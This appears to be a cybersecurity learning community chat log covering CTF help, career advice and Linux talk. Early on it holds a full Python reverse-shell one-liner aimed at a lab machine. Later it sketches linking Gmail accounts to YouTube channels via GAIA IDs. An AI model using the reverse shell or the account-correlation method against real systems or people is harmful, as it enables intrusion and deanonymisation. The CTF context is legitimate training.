#general
1 messages · Page 1792 of 1
I can't use SSH because it requires a password so i have to get information from it using nc and telnet
Did you already try to connect pyrat.thm ?
Yes and it's also added to the hosts file too
I connect with telnet no problem but not sure what else I can do with it
So, did you get something when you connect ?
Nope
You have to guess what kind of connection it is
a simple one
sorry, what kind of server it is !
Python
right, so, if you can execute python code you can get a revshell
I'm using this python 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.118.123",8000));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
That's why I asked if it should be my VPN IP address or the target machine's IP address because I am not sure if that's even right
You have to use your vpn ip adress : only it can be solved by the target.
the problem is that you are trying to invoke python in a python shell. You juste have to execute the python code
Ok my VPN address
BUT, in this room, I think there is some hint in the description
With a cleverly crafted payload, it is possible to gain a shell on the machine that should be my clue
anyone wanna help shadow with a project???
@calm skiff thank you, I'll try this
Gave +1 Rep to @calm skiff (current: #3216 - 1)
Hello Shadow!

What's the project?
would recommend helping using a virtual machine as you slightly risk breaking your real machine if you do it on actual hardware
systemd sandboxing of default services on a system + docker + ollama + sddm
systemctl list-units --all --state=running
this command lists all running services on your machine
systemd-analyze security serviceName
and this command lists its security score
we are aiming to get as many ok:s ( i.e in the 2.0-4.0 range ) as possible without breaking normal workflow
not gonna post the command to make an override.conf file for a service as you can technically break stuff if you do
@sand trench whyre u smart for
you think shadow is smart?? if so you are clearly mistaken
@sand trench do you want me to post a screenshot of the above?
well you could post a screenshot of what ever it is you are doing but not sure how it would help immediatly
I mean of this
eeeh if you run that and share a screenshot it would mostly have the same stuff as shadow unless you have installed a lot of specific software
gm girls
oh so you are not from finland after all
yeah that looks like some default ubuntu or mint distros services
Linux Mint Cinnamon
It's on a 2nd SSD so it's separate from my other one
so shadows knowledge of what is usually running on ubuntu based machines was not off.. neato
I had to install Cargo for rustscan on it
which does not have a service listed in there
can see that you installed docker though
i refuse paying for proxifier license
well then good for you
Are you an Initex employee by any chance?
I hate web pentesting so much
nope
just happy you are saving money on not buying something shadow has no clue what it is
could shadow look up what proxifier is??? sure
will they do that right now?? probably
how can i relate to this even though i did minimal web pentesting
perfect response
now
find me a reliable working secure and good opensource project doing the exact same thing as proxifier
🖐️😺
my first thought was exactly what you said 🙂
windows
ah right
kinda telling you to do your own research but providing sources for where to find alternatives and info
How're you Shadow?
relaxed and trying to find interesting youtube videos to watch
Let's gooo
while making an offline copy of the scp wiki limited to the first 10k pages that is linked from main page
Not the place.
is anyone doing the Huntress CTF?
Last warning, not the place.
Hello DKob!!

wow old github looks weird compared today when you are used to how it looks now
Eric parker videos mostly interesting
topics on what???
ah mostly malware stuffs
not super interesting to shadow
Cute. Pias5proxy paid proxies with client. Proxycap not able to handle socks5 and not working reliably for application proxification
Ah nvm i think socks 5 was supported
¯_(ツ)_/¯
hi everyone
ell gniki
it is registered now anyways
To those who've taken SAL1 or PT1, how was it?
Yes I saw that
Just gonna.........
https://www.hp.com/us-en/shop/pdp/hp-smart-tank-5101-all-in-one-printer
Please, read the title for the printer

ai printer, submit an empty document and it populates for you
this has to be sarcasm
someone hacks the ai in the printer and it starts printing out full color pages
"print me a paper of the history of Japan"
which browser is this
"print me a 1:1 1$ dollar "
no clue... it is so old shadow can't recognise it
it is from a 9+ years old video
this picture from windows xp
Looks like Brave?
Oh no no no
Genuinely concerned on why...
If you don't already hate HP enough.... now would be a great time to pick up that hatred
IT'S NOT EVEN JUST THEIR SMART ONES!
whole it department is boycotting them since 10+ years
i dont care because printing is bad for trees and i like trees 🙂
most printers bad
I quite love my Epson Workforce
I like printing manuals out. I know, I'm horrible.... but I don't go through so much paper like schools do
no joke we got a kyocera printer scanner and its amazing
costwise is not amazing tho
heard good things about brother printers but also heard they had some weird change
cat go box
Cat bread box!
Look at DKob's review for PT1
Aight
meep moops shadow is gonna go for the sleep sloops to the beep boops now
YouTube is down and ZenDesk is further being exploited
The irony being I don't have a discord account linked to this email nor have I ever used front gate tickets
Someone just messaged me to ask if youTube went down lol
so we back to the old server pic
Goodnight Shadow!

Hello Jabba!

Why're you sad Matt? 
Idk if it did but I wasn’t able to watch some vids or shorts for 30 mins
we all know you manage google's global cdn
Ah yes.... US is banned from downloading Windows 11 ISO... but swap my VPN to Canada and it's just fine...
Recently, rumours have been circulating that FN was going to discontinue the SCAR. As of a few days ago, it seems that said rumours have been confirmed.Many saw the news first circulate on the FN SCAR subreddit with unconfirmed reports from reps stating that certain legacy models of the SCAR would be discontinued.
They're discontinuing my favorite gun 

good morning guys
so i can't go into details for obvious reasons, but i just submitted my first real world bug bounty!;
Nice
hello
hopefully Jabba is asleeeeeeep
4:29 AM for him
hi
i completed intro to phishing soc sim and it says completed but progress is at 80%
Introduction to Phishing
Soc-sim
Completed
80%
......
Done!
yup lol
What is a tool I can use to remove a .zip file from a .png file? An embedded file that is, 7z is not working because it asks for the password for that zip file which is what I need to crack but I do not want to attempt to write a python script at the moment to initiate the command 7z x <image> and then brute force the password from a list, keep track of where it is at in the list, and reinitiate the connection before attempting the next item in the list
?
is this for a tryhackme room, or
ye
if the zip is in the png
I figured out the tool, I couldn't remember the name earlier for some reason, binwalk
download the zip on main pc
ah
yeah, that should work
if I used unzip it was telling me must use v5.1
Hold on, I'll get correct error msg
need PK compat. v5.1 (can do v4.6)
unzip the png or zip file?
png
u cant unzip a png
check metatdata
Nothing in metadata
I got this when I used unzip:
Archive: cutie.png
warning [cutie.png]: 34562 extra bytes at beginning or within zipfile
(attempting to process anyway)
skipping: Changed this text.txt need PK compat. v5.1 (can do v4.6)```
use binwalk to extract the zip file
then unzip
Ye, I was just showing what I did prior
🖐️ 😺
hi 🙂
365 365.zlib 8702.zip success
@marsh lark what's going on 👀
here? rn?
yes and in general
Makes sense
learning some AI stuff now
not much difference lol
lol
my life is booooooooooring
Hello Donut!

hows urs @gray sonnet
hiya dark
How're you?
good, u?
Good
Gm
Hello No Name! 
Hai
How're you?
Hello Vainn! 
Eyyy Dark!
how are you doing today?
Good
hello my slimes
I got tunnel vision sorta rn
Hello!

I hope that your day improves exponentially 
hello my darkfly slime
I'm a slime now? 
only if you want to be
Do I get the powers of the MC in the I was reincarnation as a slime story
no slime rancher i put you in a cage
i believe in u'
I will free my fellow slimes, and lead them into the formation of a new nation.
do i take this payment program interest free 850 a month
Congratulationss!!!
🥳 🥳 🥳 🥳
let me look for mine i think i did really well
😮
awww yeah i did do really well
im doing the educational rooms not the hard hacking rooms so i think its cheating
i themed my ubuntu today
Let's goooo
what do u use dark
My main PC currently uses windows 10, but my laptop uses Arch now. Specifically the cachyos that violet put in the chat before
We use arch btw.

ngl, i haven't booted my arch for a while. I stuck to windows 11, kali vm for now
do u like arch? Im just waiting for a few days off where i can really dive into it
i just did a debloated ubuntu instead as a compromise
I like pacman as a package manager
It's less keystrokes
Hyprland is kinda fun though
It means you're a smart pair of pants what else
If I do move my current PC to linux. I might do KDE plasma as my desktop manager. I mean I'll try installing hyprland, but it's finnicky or so I've heard. If Not I'm gonna switch to kde
i watched mr robot for the first time yesterday he was like "a company exec using KDE🙀 "
I mean I could do openbox too, but nah
Cybersecurity 
nice
Yeah
I wish you the best of luck! 
Is it that easy to go there? I got into gold league in 5 days?
Hello yall also excuse my name😭
Tonight?
For some people its early morning
xD
no that's impossible
you're lying
Morning THM community any reason why vouchers cant be purchased anymore?
gift vouchers?
that's so funny i tried to buy on a couple days ago to gift to someone in here
i have no clue but i wasnt able to either!
Its 8am somewhere on the planet right
verify your thm account on discord
why?
patch management
not sure why either, hopefully will come back in the future
bro w3hats going on bruhhhhhhhh Why vouchers not working anymore this is Insane bro
I wish all of you a wonderful rest of your night/day. See you
Ask staff
Maybe they plan to open it back
hopefully they do man cause this is crazy
Any staff member you suggest?
Everyone's good but don't dm them on discord. Ask support through the website.
Thanks for the advice brother
Gave +1 Rep to @queen flare (current: #161 - 60)
give scorpius +1000 rep
is tryhackme being slow for u guys
yes
Is there any legendary pro hacker here who can help me a little?
help with what?
Please don't ask for something illegal
how much are you willing to pay in exchange for da help
-# (nowhere near “a hacker” btw)
Location tracking
yeah, no one's helping with that. tracking someone's location without consent is illegal.
Guys I recently learned how dark digital forensic is
nothing dark about it
i was gonna say XD
Ehh yes there is, the criminal side
My iPhone has gone missing
if you're talking about things a dfir person might find when investigating, sure but thats not dfir itself being dark
the cooperate side of it doesn’t involve crime.
so what's your point?
That sucks
contact police. we can't find it for you
long story lol
Okay?
That he’s referring to DFIR while I was talking about a Forensic Investigator, whose role is versatile. If I were talking about DFIR then would’ve just said that lol
are you a forensic investigator
👍
Not yet
i do a little bit of forensics mainly for phishing emails its prob my fav part of the job
I love DFIR man
You're gonna have a bunch of fun 🙂
lol
GM yall
mornin
chill
ur like SIEM lol
LOL
hii
i want to start my hacking journey what will be my roadmap and how to start hackin g
read #start-here
girls?
yeah gm
-# I'm not a girl tho
hmm thats wierd
what?
try hack me website learning content and labs are free ??
not completely
around 60% of rooms are free
both free and paid
if i want to only use free labs then i can learn complete hacking ?
youll never learn everything. but its a good place to start
probably u cant however you can test youself from labs
ok
it is also key that you probably won't learn everything through one site
while using tryhackme, do your own research
such like i want to hack any website in form of ethical hacking part not any type of harm
then free labs are enough ??
Any website + with permission of the owner of the website
ohk
thats how you call it 'ethical'
you can understand like my website
imo not really, but it is a good starting place and gets you to intermediate level
and i want to hack it
(better if you can get premium, but free rooms are great too)
may I ask where it is hosted?
todays i start offesive security part and when i started it mechine not opening
like is it hosted on aws for example?
I think then you need to also get permission from vercel
because technically they are hosting it
ohk
but this will be very tricky, because you need a contract as well
I'm not exactly sure how it works in this type of scenario, but you will need to get permission from them
you gotta /verify
ohh
did you read #start-here ?
-# oh yeah, it is literally in there LOL
Have a look around. Try it out.
It's pretty basic. I'm not going to guide you through it step by step
I'll just give you some pointers and you test it out
Pre security path then cyber security 101 is good to start
- the "Roadmap" section contains the roadmap (which also includes premium rooms), which you can follow if you want to
- Modules are groups of rooms that are about a specific topic
- Walkthroughs are rooms that teach you something, which you can sort by newest, etc.
- Challenge rooms (which you can find my clicking Practice) are rooms you can test your skills on
thnks brother


HTB
Thm is more beginner friendly
THM is for beginners but after some foundation building, go to HTB
HTB gives you a more realistic idea as to how real life pentesting is like
I'd recommend starting with THM
htb rooms are free ??
HTB is for when you actually know how to do stuff without guidance.
Nope
ohh
to some extent yes, you get the same amount of cubes as the amount you used to start a room
well if you do retired machines in HTB, you can do with guidance
you have write ups
i think htb is advance version of thm
and video walk throughs
You need to pay for that iirc
kinda?
oh well yea
He asked free lol
learning is academy, no?
i have VIP+ in HTB so i just solve both retired and active machines
yes
ohk
Wdym? Their learning platform?
yes
No you dont you get some cubes but not all you used to unlock the module
-# luckily I'm a student
they have 2 platforms
htb labs and htb academy
labs is only machines
academy is learning material
Kratos I talk to you in the HTB server
I know homie
some modules give back the same amount of cubes when you finish it as the same amount as you used
Wassup lol I just lurk here
how you doing
anyone know about how to do real life hacking like i want to crack a password then you all are able to do ?
Finishing up work so bored at the moment.
Maybe a couple but its mostly like a one fifth of the cubes used
and tired
not necessarily, no
most of the time, yeah
is it to an account you own on a service you own?
these platforms teach you just that
yeah
i want to exp on my paltform
not any extrenal website or 3rd party applications
start with THM
build a foundation
move over to HTB
@marsh lark the best way to abuse academy is through their student plan. You can get tier 1-2 modules free (Yes they give you cubes when you complete them) so you can accumulate a stockpile of cubes for some of the higher tier content, but obviously it won't last long.
-# I know

luckily, I'm a student for like 8 more years 
4 years maybe
oh lawd
I just started high school, so
bro is going to type a promotion message
unless you have a student plan. everything is cube free
until tier II anyway
But for beginners, thm is very super duper friendly
Ermah gawd is that a hot chick? 😻
I'll surely fall for your invite ms.mcc27jq9m01l8s7 what a lovely name 😻
for beginners i can recomend thm
yes.
if I started with HTB, I wouldn't understand ANYTHING lol
LEGIT HAHAHAHA
its too text heavy
Ngl I stopped at this level on thm and jumped to HTB
I started htb after finishing jr pt and some portswigger module/ labs
Ooooo nice
also PicoCTF challenges are very good
This month is my last month of college, so I can finally do more with my time 
ngl, someone is gonna give me a HTB 25 dollar gift card
soon, hopefully
Dope, abuse it to the best of your abilities lol
which I can use my student email to get what 3 months LOL
If you ever need box guidance check out ippsec it's either 1 p or 2
But you'll be fine
would thm’s red team path alone train me to OSCP
What do you mean cube free like if you pay up front 1000s or more euros or dollars
this is a problem tho ngl
with HTB
too expensive
THM is perfect price
honestly thm tought me lot im nearly done w pt1
yup
$8/month and you get this. You don't need cubes. You'll need cubes for tier III modules up. For THM you get everything.
You have not fully advertised any other discord yet, but has a heads up, please do not do so as this might get you removed from the server 🙏
No i dont think so
they had multiple accounts banned earlier today
really?
did it
Well yeah what about when you need tier 3 modules or you arent a student
Can you DM me about it please? Not fully aware of it
yer. just kept joining with different accounts with nonsense names
That's why i prefaced it with "Unless you have a student email"
Grats
thats why HTB is too pricy
now i want to sleep
It really is too much
bruh, gold annual is 1260/year but doesn't even give FULL access
-# altho they do give exam vouchers per year
but even the monthly ones, goodness
But i guess it isnt if a company is paying for you or youre in the industry and rich
THM give access to all rooms for WAY less
Yeah and you have to complete the full path for the exam
Hey everyone hope all is good, is anyone else having issues with the Osquery room? I have 2 questions that won't mark as correct when I know the answer is correct
try asking in #room-help
That I will, didn't think it would be too bad to ask here as well
Ngl the only thing I like from THM is the Christmas event they do for 30ish days. Can't remember the name
Advent of Cyber
Yee
me excited for both AoC and AoC LOL
Has there been sites maintenance, have encountered several issues from losing room points to a demotion from diamond to bronze than back to diamond missing all points?
yeah, hopefully they are all fixed soon
we want less bugs lol
Ah OK probably explains the room bug as well 
he just search for easy rooms to get more XPs damn mann
5840 he just wanna be the best at Xp not at cybersecurity
but he is at Ruby league lol
Fight fight fight lol
why are you trying to shame him for being dedicated?
5000 xp is possible, but in many cases means they are cheating
you can also check their room history and see in some cases (had someone solving multiple easy rooms in 2-3 minutes each)
no brother not for that i just wondering why
that what i mean
thanks for explaining @marsh lark
Gave +1 Rep to @marsh lark (current: #28 - 390)
no problem 🙂
are u him dude Lol
Does thm even ban cheaters 
they do
they just leave the account but doesn't make them accessible in any way
That's nice atleast
everywhere there is even in CS2 go lol %80 of them
they know the game better then VAC there lmoa or the cs2 developers
different target audience
i’ve known internships that offer htb subscriptions
that is true
hell, one place even offered oscp
benefits them, if anything
true
the intern would continue working with them
and the certificate really just proves his worth
and become a full-time employee in the future?
yeah
-# THM, hire me
Hey guys I've completed all google cybersecurity certs now wondering how to move forward
Offensive?
up to you
up to you
If you were in my place
Okay
But if I want to be in offensive
Like what should I really do now like what the next step on ladder
rate your current mastery in offensive security
that ladder does not exist my friend
Haha
hello guys
yep, all are good steps
-# imo it shouldn't be in the first place
I wanna land job
yeah
An internship I applied for offered SANS the $10k certs
goodness
Shit is insane lol
Like I have linkedin too I have google certs too i
where??
im interested in whether you got offered the place
Nope, but had a 2 hour lunch interview with them. I learned a lot especially with how my city is adapting CyberSecurity and IT.
The land of gators
either aussie or florida
??
Florida
no gif perms 💔
You need to verify your account first
😭 soulmate got pwned nooo
@gusty inlet you ready for one more?
I feel you 🤝
At my induction two lecturers gave us a brief insight on their pedagogy, so they chose a task that involved analysing an email of a CEO. I think the salary data sheet was leaked to their competitor.
It was fuun ngl
Finally!
seems like a cheater, you can email tryhackme
be very specific tho
like which week it was, what league, what their username is, etc.
@mossy river does Vmware normally use more storage when it is running?
cuz when it isn't running, it seems to be at around 20+ GB, but now it is almost 40 GB
they are most likely cheating
What's the next league after ruby? I wanna see how it looks like
diamond I believe
Open the badges list, you'll see what it looks like
I'm afraid to report him and wrong him he might not be a cheater
still best to email tryhackme
report them
getting that amount of points in less than a week is not possible for a human without cheating
The highest points I've ever reached in my life were 5k in a week But 12,000 is a lot, honestly
-# so email (basically reporting)
thin disk?
ok thx\
Gave +1 Rep to @marsh lark (current: #28 - 391)
Does their account gets banned or gets banned from the leagues
you misunderstood
their account gets banned
12k points in like 3 days
ah
or dynamic
uhh
I believe it is dynamically allocated, one sec
yup, so just shut down the machine
and it went from 39GB to 23GB
the size of the folder containing the VM I mean
yeah he might be a cheater
What does this mean ?
Use of it ?
I think it makes the points increase more, but only for 30 min
@gusty inlet ready
DM username pls.
lol he is 14140 points know 
yup, cheating lol
rip i can't join i got a morning class in 9 hours
i could join but i should get sleep
ahh, then sleep
its an online class so i don't have to wake up in 7 hours
assuming this is a hard room, this event might be 1.5-2 hours long
what is the subject
is it red or blue
red
alr
AD
sup
@mossy river @gusty inlet the trio LOL
i am not at the skill level of hard rooms in red team so ill be fine missing it
luckily they record, so
sup
this is kind of useless unless you speedrun a room hampering real learning
Is this live ?
Yes!
I lose connection
Entire distro got corrupted, guess I'm dumb for going straight to an advanced distro, and lost most of my files. Lucky I had some backed up. Mint Cinnamon for me now hahah. Feels like a different distro so far though. But I get to go through the process of downloading and installing all the tools manually and probably doing some configuration.
Guys, how can I learn topics like tracing and findings
tracing and finding what?
You mean osint?
information gathering niches
Crypto tracing?
Vulnerability finding
Its quite vague
data centers in india are subjected to a law, by which they are forced to keep logs along with user information for 5 years at least, and the government can ask for those logs anytime.
if the data center is located in mumbai, i assume tryhackme would do the same?
that's up to the owner of the data center to maintain, not organisations that use it
Unfortunately I cannot discuss TryHackMe infrastructure for security reasons, if you have any concerns I would advise you to contact support 🙂
thanks, i just want to know about if selecting mumbai server is worse for my data privacy. i guess i'll ask support about it.
Gave +1 Rep to @mossy river (current: #6 - 1825)
what is that
BoF vulnerability
Hm? how?
hey guys, is there a problem to the soc simulator?
i saved my progress and now I went back to it, but when I click on dashboard, the page goes white and nothing else happens
Are you using a free SOC SIM or are you on a b2b account?
paid premium account, phising unfolding 2
You will need to open a ticket with support
Would you recommend the Soc certificat ?
Intenger*
when i terminate the machine i don't have target ip
i can use it
it just disappear
like it crushed and after refreshing the page i terminated again
and there's nothing
well yes, because you terminate the machine
you stop the machine
thus the IP gets removed
i'm confused
about?
oh
i said everything wrong lmao
i meant something different
sorry eng not my first
thats okay
the attackbox or the other machine
and there's no ip
yo any pro expereinced hackers in here?
attack box
yeah me
probably a lot
omg i forgot i have to start machine as well
the attackbox IP is in the top right
yesss you need to start them both
so you can remote desktop from the attackbox into the other machine
Great may I know you're experiences and skills in this field?
ethical hacker?
well yeah, we only do ethical things in this server
ovsly yeah but working for someone
i have worked for someone
I wanted to ask like how we can look out for jobs as an ethical hacker
Do you have experience in IT, certifications, maybe some projects
I have enough experience in IT but im looking for certifications and projects as my experience
I would like some guidance in this field so i wanted to reach out a professional cypherpunk
i think your best bet would be to type out your question, what kind of experience you got etc and post that in #cyber-and-careers people there are more knowledgeable and will be a better guide if they can help
thanks I will
Gave +1 Rep to @slow cloud (current: #54 - 196)
@cloud quiver i do the same thing sometimes for maintaining streak xD

i'm going insane why attack box works so bad
i need to terminate it and start several times to make it work
😂
what should i go for
Hey
@mossy river I forgot to tell you, you know the new beta VM region in Asia? during today's event, I launched my machine in that beta region before the event started, but when I tried an nmap scan (at this point, DKob's stream started and he was also doing an nmap scan), it showed no ports open (without the -p-, so only the top 1000 ports, but still). When terminated the machine, changed the VM location to US East (N. Virginia), that machine did work normally and showed all ports that were supposed to be open
just wanted to let you know
tryhackme xD
Echo branding removed lol?
portswigger
Bro I can't have proper roadmap of thm please do some help
wdym no roadmap do pre security then cybersec 101 then go for ur fav category
Can we talk in dm
ok
Check dm
idk must trust or not 🗿
but ok
wdym?
nope, sometimes i always get pranked when i newly join server 😂
Had these pop up after certain challenges
hi, I've recently been crawling web because few osint people mentioned that there is a possiblity to find email from youtube account. Found another mention in reddit but could not confirm this method. Has anyone done it before?
YouTube and most Google services uses a special internal identifier known as the GAIA id. When you enter a random Gmail on the login page it will also show the GAIA id in the HTML response. People can theoretically build a list of GAIA IDs from gmails and tie them to the same GAIA ID of YouTube channels to figure out which channel is linked to which Google account. Every Google service tied to a Gmail will always have the same GAIA ID. That means Google drive as well.
why would you need to find a email based on youtube account
osint
like most of us here learning the offensive side to protect from it, this is the case. Cause some russian osinters admitted there is a method to do it and i never found any references.
no clue
Russians chat shit on a regular basis, I'd take no notice
@sand trench https://github.com/DreamMaoMao/mangowc might you like it
I can confirm, that this method indeed exists but leaking it would cause more problems than solving. Its so unknown that i doubt u need it to protect urself or others from it. The only reason u need this information for is to hijack someones account and not to protect urself.
Even if u knew the method, you couldn‘t do anything to protect urself because the Bug thats being abused for this certain method has to be fixxed by Google itself.
So you are telling me it's almost like a 0day shit or what?
Exactly
for what reason?
neato... looks like something similar to chadwm for dwm but for dwl instead
inclusion-exclusion
the tryhackme room?
but like why
i just run on it
https://www.youtube.com/watch?v=Q1Jgw_q0gWE
This is a quick and painless guide on getting MangoWC up and running with sane config options, and how to customize it yourself. This compositor is a well designed fork of DWL, with much more features, and no recompile needed.
Written Article: https://www.tonybtw.com/tutorial/mangowc/
Repo: https://github.com/DreamMaoMao/mangowc
*My Mango C...
why are u asking @glossy holly
mango?
window manager
wut wut
wayland compositor not window manager
there is some differences
that most people will never care about :P
Guys I got a spare laptop would u rather use a machine exclusively for Cyber Security or keep it in a VM?
Well in my case a docker
yea... i'm sorry my lord 🙂
i don't understand something tasks
i just think some people know discrete math in this chat
u can always search them up to understand how they worj
Discrete math is pretty broad. Do you have something specific you are looking to know?
What is discrete maths? What does maths have to hide?
hi everyone
i love this song (see my profile)
the numbers because one thing for sure is the more advanced math gets the more it becomes reading text rather than numbers
understand "The principle of Inclusion-Exclusion"
Ahhh yes Y does my maths have letters in it. What is X?
X = Y
equation Y do you still think about your X? drop it
You should check out TrevTutor on YouTube
yesssss, and proof about your answer
so hard for me
GOD I hate math problems where you have to prove something
-# those are easy /j
just don't do maths, I've never needed it
bro i dont think i have done a math problem that was just a raw computation in like 5 years its just proof
i just know logical, but can't prrof it
its like the dexter doakes meme
xd
For some reason when I do thm rooms I cant access websites remote machines why ? On my vm
try asking in #site-support
@cloud quiver / @gusty inlet (or any staff member available)
May I advertise an upcoming CTF here? Starts in an hour, so it's a last minute push for whoever is interested.
its not that difficult until you understand how the original mathematicians got there
@mossy river as well 🙂
How do i hack
og math heads representing
Yeah. I didn't know if he was online or not
read #start-here @tired summit
answer = easy4
I know the tangerine is a Z...
Not going to be possible unless Jabba makes an exception which I doubt.
Will i be able to hack my old accounts back?
that is illegal

if those accs are his, it isn't
Real
if its a roblox account for instance
is it really yours?
or roblox's?
you do realize you're breaking into a company?
Ts mine
by german law its yours
in theiry, to "get back your acount", you have to hack in roblox
technically
which is illegal
idk about the laws in yout country
without specific permission
You're in the Fluff clan now Donut?
yes
Thats like me forgetting my laptop in a school then I decide to break into it late at night
it should be no different in germany lol
in germany every account u create belongs to you. if you bruteforce it for instance
nothing illegal
so you're are saying
that if I lose an account because of phishing for instance
I can do everything I can to get that account back
even if it means hacking into the company?
the easiest way is by court
well, that is a legal way
exactly
you don't
bruteforcing is also legal as long as you bruteforce ur stuff
let's sue the company
keypoint YOUR stuff
the company is not yours
and the account belongs to the person
could you show me the exact law that says this
the account is not yours; the account is company property
Hello Jabba!

no it isn't by german law lmao
the company can write in their tos whatever they want
if you live in germany ur data belongs to u
ah, your data
that changes things
It's being organized by one of your recruiters, and sponsored by one of your cross-community orgs (I think), if that makes any difference.
who's property is the account by holy law though? that's the highest instance of law there is
credentials are basically ur data
what if the creds are changed?

